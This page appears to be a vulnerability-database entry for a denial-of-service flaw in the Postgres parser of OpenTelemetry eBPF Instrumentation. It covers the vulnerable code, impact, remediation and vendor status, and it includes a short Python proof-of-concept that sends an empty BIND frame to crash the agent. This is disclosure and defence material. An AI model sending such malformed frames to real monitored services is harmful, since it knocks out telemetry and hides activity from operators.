Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
The Postgres protocol parser assumes BIND message payloads contain a valid NUL-terminated portal name. A crafted empty or unterminated payload can make OBI slice beyond the end of the captured buffer and panic.
Details
The vulnerable logic is in pkg/ebpf/common/sql_detect_postgres.go. In the BIND case, OBI converts the full payload to a string with unix.ByteSliceToString(msg.data), computes portalLen := len(portal) + 1, and then slices msg.data[portalLen:] to derive the statement name.
There is no check that msg.data actually contains a NUL terminator or even enough bytes for portalLen. With an empty payload or a truncated message, portalLen can exceed the slice length and trigger a runtime panic.
PoC
Local testing with a minimal reproducer showed the expected slice bounds out of range crash for an empty BIND payload.
Use a vulnerable build:
git checkout v0.0.0-rc.1+build
make buildStart a local Postgres instance and OBI:
docker run --rm -e POSTGRES_PASSWORD=postgres -p 5432:5432 postgres:17
sudo ./bin/obiSend a malformed BIND frame with an empty payload:
# save as /tmp/pg-bind-poc.py
import socket, struct
tag = b'B'
length = struct.pack(">I", 4)
payload = b""
s = socket.create_connection(("127.0.0.1", 5432))
s.sendall(tag + length + payload)
s.close()Run it:
python3 /tmp/pg-bind-poc.pyOn a vulnerable build, the Postgres parser in OBI panics while processing the captured payload.
Impact
This is a remote availability issue in OBI's Postgres parser. Any attacker able to send malformed Postgres traffic to a monitored service can crash the agent and stop telemetry collection for that node or process.
AnalysisAI
Denial of service in OpenTelemetry eBPF Instrumentation (OBI) versions prior to 0.9.0 allows remote attackers to crash the telemetry agent by sending a malformed Postgres BIND frame with an empty or unterminated portal name payload to any monitored service. The defect lives in OBI's passive Postgres protocol parser, where missing NUL-terminator validation causes a Go slice-bounds panic, halting telemetry collection on the affected node. Publicly available exploit code exists in the GHSA-pgvv-q3wf-mm9m advisory, though the issue is not listed in CISA KEV and EPSS data was not provided.
Technical ContextAI
OBI is a Go-based eBPF instrumentation agent (package go.opentelemetry.io/obi) that passively observes application traffic - including Postgres wire protocol exchanges - to derive distributed traces. The flaw resides in pkg/ebpf/common/sql_detect_postgres.go around lines 286-294, where the BIND-message handler calls unix.ByteSliceToString(msg.data) and then computes portalLen := len(portal) + 1 before slicing msg.data[portalLen:] to extract the statement name. Because ByteSliceToString returns the entire buffer when no NUL byte is present, portalLen can exceed len(msg.data), and Go's runtime bounds check panics with 'slice bounds out of range'. This is a textbook CWE-20 (Improper Input Validation) issue - the parser trusts that captured packet bytes conform to a well-formed protocol structure rather than validating buffer length before indexing.
RemediationAI
Vendor-released patch: upgrade go.opentelemetry.io/obi to version 0.9.0 or later, per the GHSA-pgvv-q3wf-mm9m advisory (https://github.com/open-telemetry/opentelemetry-ebpf-instrumentation/security/advisories/GHSA-pgvv-q3wf-mm9m and https://github.com/advisories/GHSA-pgvv-q3wf-mm9m). If immediate upgrade is not feasible, compensating controls include restricting network reachability to monitored Postgres-speaking services so that only trusted clients can open TCP connections on port 5432 (trade-off: legitimate clients from outside the trust boundary will also be blocked), or temporarily disabling OBI's Postgres protocol detection on exposed hosts (trade-off: loss of Postgres-level telemetry visibility until the upgrade is applied). Operators should also configure a process supervisor to automatically restart OBI after a crash to limit telemetry blackout windows, though this does not address the underlying panic.
More in PostgreSQL
View allPostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() improperl
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
Argument injection vulnerability in PostgreSQL 9.2.x before 9.2.4, 9.1.x before 9.1.9, and 9.0.x before 9.0.13 allows re
Unauthenticated arbitrary file write in Splunk Enterprise (below 10.2.4 and 10.0.7) and Splunk Cloud Platform (below 10.
PostgreSQL versions before 9.2.22, 9.3.18, 9.4.13, 9.5.8 and 9.6.4 are vulnerable to incorrect authentication flaw allow
The build_tablename function in pgsql.c in the PostgreSQL (aka pgsql) extension in PHP through 5.6.7 does not validate t
A vulnerability in the h2oai/h2o-3 REST API versions 3.46.0.4 allows unauthenticated remote attackers to execute arbitra
In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_serve
## Summary An unauthenticated SQL injection vulnerability exists in the Vendure Shop API. A user-controlled query strin
Parse Server is an open source http web server backend. Rated critical severity (CVSS 10.0), this vulnerability is remot
Hard-coded default PostgreSQL credentials shipped in the docker-compose.yaml of langgenius Dify through version 1.5.1 al
A vulnerability in the FinanceChatLlamaPack of the run-llama/llama_index repository, versions up to v0.12.3, allows for
Same weakness CWE-20 – Improper Input Validation
View allSame technique Denial Of Service
View allVendor StatusVendor
SUSE
Severity: High| Product | Status |
|---|---|
| SUSE Linux Enterprise Desktop 15 SP7 | Fixed |
| SUSE Linux Enterprise High Performance Computing 15 SP7 | Fixed |
| SUSE Linux Enterprise Module for Basesystem 15 SP7 | Fixed |
| SUSE Linux Enterprise Server 15 SP7 | Fixed |
| SUSE Linux Enterprise Server 16.0 | Fixed |
| SUSE Linux Enterprise Server 16.1 | Fixed |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.0 | Fixed |
| SUSE Linux Enterprise Server for SAP applications 16.1 | Fixed |
| openSUSE Leap 16.0 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-33952
GHSA-pgvv-q3wf-mm9m